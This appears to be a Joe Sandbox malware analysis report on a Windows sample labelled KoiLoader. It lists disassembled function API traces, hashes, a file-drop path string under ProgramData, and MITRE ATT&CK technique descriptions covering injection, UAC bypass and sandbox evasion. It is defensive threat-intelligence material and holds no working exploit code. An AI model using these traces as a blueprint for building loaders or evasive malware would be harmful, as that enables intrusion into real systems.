API String ID: 0-1406877022
Opcode ID: a6c200d4786a914e6a22e49178137fb71d619078b25d0ee82a7aeb891890aea6
Instruction ID: 159b8cd76f7d07500f32f83cd9a9d46f111d94b20a1cb5f6cb87e2ffa5aff6cf
Opcode Fuzzy Hash: a6c200d4786a914e6a22e49178137fb71d619078b25d0ee82a7aeb891890aea6
Instruction Fuzzy Hash: FC112871C5061DCADB45CFA8D9083BEBBB4FB04344F10C25AD8127A280DB748A85FB61

Function 00F083E9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,32DDA911,?,?,00000000,00F12094,000000FF,?,00F083C5,?,?,00F08399,00000016), ref: 00F0841E
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F08430
FreeLibrary.KERNEL32(00000000,?,00000000,00F12094,000000FF,?,00F083C5,?,?,00F08399,00000016), ref: 00F08452

Strings

mscoree.dll, xrefs: 00F08417
CorExitProcess, xrefs: 00F08428

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 333a6257043818234507f654d4576406856367106790895ca23d18017126b8ca
Instruction ID: 7f57c7c0e674ea4172ad931b70021942ccf165be3ad1cafa65c908e8dd493266
Opcode Fuzzy Hash: 333a6257043818234507f654d4576406856367106790895ca23d18017126b8ca
Instruction Fuzzy Hash: 3101A23590065DEBCB11CB50DC09BEEBBB8FB08B54F018629E811A22E0DB749A00EA91

Function 005E7500 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26fileCOMMON

Download Yara Rule

APIs

wnsprintfW.SHLWAPI ref: 005E751F
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 005E753B

Part of subcall function 005E6C60: VariantInit.OLEAUT32(?), ref: 005E6C77
Part of subcall function 005E6C60: CoCreateInstance.OLE32(005E1020,00000000,00000001,005E1000,?), ref: 005E6C94
Part of subcall function 005E6C60: SysAllocString.OLEAUT32(\Mozilla), ref: 005E6CD4
Part of subcall function 005E6C60: SysFreeString.OLEAUT32(?), ref: 005E6D0B
Part of subcall function 005E6C60: SysAllocString.OLEAUT32(Firefox Default Browser Agent 318146B0AF4A39CB), ref: 005E6D18
Part of subcall function 005E6C60: SysFreeString.OLEAUT32(00000000), ref: 005E6D2F

Part of subcall function 005E96F0: GetFileAttributesW.KERNEL32(?,005E7551), ref: 005E96F1

DeleteFileW.KERNEL32(?), ref: 005E755C
ExitProcess.KERNEL32 ref: 005E7564

Strings

%%ProgramData%%\r%Sr.js, xrefs: 005E7514

Memory Dump Source

Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd

Yara matches

Similarity

API ID: String$AllocFileFree$AttributesCreateDeleteEnvironmentExitExpandInitInstanceProcessStringsVariantwnsprintf
String ID: %%ProgramData%%\r%Sr.js
API String ID: 3376550436-2368859843
Opcode ID: 18435630c87898facfedcb8547c8736db17949b3a192d3602f8c8817757ecd8a
Instruction ID: c368e04cf90747b9ea9a94bdf09cea6526f80ee30f59a66cc9aa6bd979faf6e5
Opcode Fuzzy Hash: 18435630c87898facfedcb8547c8736db17949b3a192d3602f8c8817757ecd8a
Instruction Fuzzy Hash: 60F0A7B180035CA7DB18EBA1CC8DEDB7B3CBB04705F4005A1B3D5A60A1DBB056C8CE14

Function 00F0CAB0 Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00F0CB35
__alloca_probe_16.LIBCMT ref: 00F0CBFE
__freea.LIBCMT ref: 00F0CC65

Part of subcall function 00F093A5: HeapAlloc.KERNEL32(00000000,00F011AD,?,?,00F011AD,?), ref: 00F093D7

__freea.LIBCMT ref: 00F0CC78
__freea.LIBCMT ref: 00F0CC85

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 5866b77cf71473dbba1c1b4a647115f8e92fd4fd54e791b1f57f2e86873c2d13
Instruction ID: 2fe958c8656dfb34c4dc7ed149eb8e16207a56ccf1a73b4163585c970e325dc3
Opcode Fuzzy Hash: 5866b77cf71473dbba1c1b4a647115f8e92fd4fd54e791b1f57f2e86873c2d13
Instruction Fuzzy Hash: D251D572A0024AAFEB219F65CC45EBB76A9EF84720F154229FD09D61D0EB35CC54F7A0

Function 00F06E12 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00F06DC3,00000000,?,00F1BD48,?,?,?,00F06F66,00000004,InitializeCriticalSectionEx,00F13C98,InitializeCriticalSectionEx), ref: 00F06E1F
GetLastError.KERNEL32(?,00F06DC3,00000000,?,00F1BD48,?,?,?,00F06F66,00000004,InitializeCriticalSectionEx,00F13C98,InitializeCriticalSectionEx,00000000,?,00F06D1D), ref: 00F06E29
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00F06E51

Strings

api-ms-, xrefs: 00F06E36

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 1151ee0b37d64bdbb2b76a7564e950b7eb2dac15a88f6a2d77ee5c6c0905d2dd
Instruction ID: aa0a5de5bd991d2e9f79856692eb2647bfb39fc7a33ef92c77939861deb7f37b
Opcode Fuzzy Hash: 1151ee0b37d64bdbb2b76a7564e950b7eb2dac15a88f6a2d77ee5c6c0905d2dd
Instruction Fuzzy Hash: 86E04F74680308F7EF201B61EC06B993F999B10F54F118020FA0DF80E2DB71DA61B98A

Function 00F0CF7D Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(32DDA911,00000000,00000000,00000008), ref: 00F0CFE0

Part of subcall function 00F0A5D9: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00F0CC5B,?,00000000,-00000008), ref: 00F0A63A

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00F0D232
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00F0D278
GetLastError.KERNEL32 ref: 00F0D31B

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: bc2ecd5650c21a20f3df98d4bad7a8e3eb3b525151d45800135794812da5dfb6
Instruction ID: ce68b960d5f369510ff7d3dba195897ccc06fe7ffe4e27444653ad0398e6cbb7
Opcode Fuzzy Hash: bc2ecd5650c21a20f3df98d4bad7a8e3eb3b525151d45800135794812da5dfb6
Instruction Fuzzy Hash: 03D16B75D042489FDF15CFE8D880AEDBBB5FF09314F24416AE856EB391D630A942EB50

Function 00F05DD4 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00F05E9B
___AdjustPointer.LIBCMT ref: 00F05EBE
___AdjustPointer.LIBCMT ref: 00F05F5A

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 17f11c73530142359872d3a1b3dda0276b4323f8f5a938c225673f14ab2aa124
Instruction ID: 4cafd27f2d26a445ca3da300640de231021423b9a18c13a9ff661eef98694932
Opcode Fuzzy Hash: 17f11c73530142359872d3a1b3dda0276b4323f8f5a938c225673f14ab2aa124
Instruction Fuzzy Hash: F251C272A04A02EFDB259F14D841B6BB7A5EF00B21F24412DE9458B1D1D7B5ED40FF90

Function 00F0E756 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00F0DF10,00000000,00000001,?,00000008,?,00F0D36F,00000008,00000000,00000000), ref: 00F0E76D
GetLastError.KERNEL32(?,00F0DF10,00000000,00000001,?,00000008,?,00F0D36F,00000008,00000000,00000000,00000008,00000008,?,00F0D912,00000000), ref: 00F0E779

Part of subcall function 00F0E73F: CloseHandle.KERNEL32(FFFFFFFE,00F0E789,?,00F0DF10,00000000,00000001,?,00000008,?,00F0D36F,00000008,00000000,00000000,00000008,00000008), ref: 00F0E74F

___initconout.LIBCMT ref: 00F0E789

Part of subcall function 00F0E701: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00F0E730,00F0DEFD,00000008,?,00F0D36F,00000008,00000000,00000000,00000008), ref: 00F0E714

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,00F0DF10,00000000,00000001,?,00000008,?,00F0D36F,00000008,00000000,00000000,00000008), ref: 00F0E79E

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 3dcfc16af6f3e4bb3c2b63ae143dfa4b069e324d08642bd2248a4ba9d6f95d46
Instruction ID: 9cb94c2a1227b5dc52a99054dabe25ff27d67fbf1908de0f6681885328ab2d07
Opcode Fuzzy Hash: 3dcfc16af6f3e4bb3c2b63ae143dfa4b069e324d08642bd2248a4ba9d6f95d46
Instruction Fuzzy Hash: 0DF0AC3651215CBFCF226FE5DC08AD97F66FB487B1B558410FA2995160C632C921FB90

Function 00F063D0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 00F063F5

Strings

MOC, xrefs: 00F06407
RCC, xrefs: 00F0640F

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: b005fab1b0ef0d04cfc56835c30dc65c9e46822e30ba124ce8c2079308504cdc
Instruction ID: 78f0a77d32f53640720293bb916a7046ff3d048813ebe6d1daac65a589f691d3
Opcode Fuzzy Hash: b005fab1b0ef0d04cfc56835c30dc65c9e46822e30ba124ce8c2079308504cdc
Instruction Fuzzy Hash: 86418675D00209AFDF15CF98CD81AAEBBB6BF08314F198099F904A72A1D37599A0FB50

Function 00F01110 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 00F0111B
GetModuleHandleW.KERNEL32(00000000), ref: 00F01162

Strings

kernel32, xrefs: 00F01116

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: HandleModule
String ID: kernel32
API String ID: 4139908857-541877477
Opcode ID: 62655b34cc702b3265c2161809f01352ddaf9f46e1d8faf63c845aa9fb70d031
Instruction ID: e7ba486d4342269b4319e9ad757992d02d22e670a700c0ec4e4ab4b3addeb366
Opcode Fuzzy Hash: 62655b34cc702b3265c2161809f01352ddaf9f46e1d8faf63c845aa9fb70d031
Instruction Fuzzy Hash: 7621C7B5D0020CEBCB04DFE4DD45AEEBBB4BF48305F108558E905A7280E7359A41EF61

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report JT1yqn67un.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: KoiLoader

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

System Behavior

Windows Analysis Report
JT1yqn67un.exe

Function 005E89F0 Relevance: 219.4, APIs: 80, Strings: 45, Instructions: 640
libraryloaderCOMMON

Function 00F01300 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 297
librarymemoryloaderCOMMON

Function 005E9250 Relevance: 3.0, APIs: 2, Instructions: 49
COMMON

Function 00F01710 Relevance: 1.6, APIs: 1, Instructions: 103
COMMON

Function 00F03C30 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 40
timeCOMMON

Function 005E5FD0 Relevance: 68.6, APIs: 30, Strings: 9, Instructions: 309
libraryfileloaderCOMMON

Function 005E7920 Relevance: 51.0, APIs: 26, Strings: 3, Instructions: 265
memoryCOMMON

Function 005E94B0 Relevance: 50.9, APIs: 21, Strings: 8, Instructions: 192
libraryloadermemoryCOMMON

Function 005E72E0 Relevance: 49.2, APIs: 19, Strings: 9, Instructions: 154
stringCOMMON

Function 005E5C60 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 277
injectionthreadprocessCOMMON

Function 005E6D50 Relevance: 70.4, APIs: 31, Strings: 9, Instructions: 426
memorycomCOMMON

Function 005E8120 Relevance: 61.6, APIs: 21, Strings: 14, Instructions: 350
libraryloadersleepCOMMON

Function 005E6830 Relevance: 52.7, APIs: 27, Strings: 3, Instructions: 230
memorynetworkfileCOMMON

Function 00F03670 Relevance: 42.4, APIs: 4, Strings: 20, Instructions: 354
COMMON